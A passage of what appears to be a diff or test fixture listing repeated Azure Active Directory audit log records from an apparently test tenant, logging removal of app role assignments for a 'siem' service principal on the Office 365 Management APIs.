"71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "ac045271-8d7f-49b2-abc9-5130051d879f"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:06.3062012Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38464434"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "d8a2ae24-a752-4f8e-adca-c57189a76a71"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "ac045271-8d7f-49b2-abc9-5130051d879f"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:06.3062012Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38464425"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "7f09b681-251f-4ff0-97cf-5247891b6981"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "ac045271-8d7f-49b2-abc9-5130051d879f"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:06.3062012Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38464434"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "d8a2ae24-a752-4f8e-adca-c57189a76a71"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "ac045271-8d7f-49b2-abc9-5130051d879f"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:06.3062012Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38464425"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "7f09b681-251f-4ff0-97cf-5247891b6981"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372061"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "02868191-019a-453a-a3a9-a21f44898778"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, 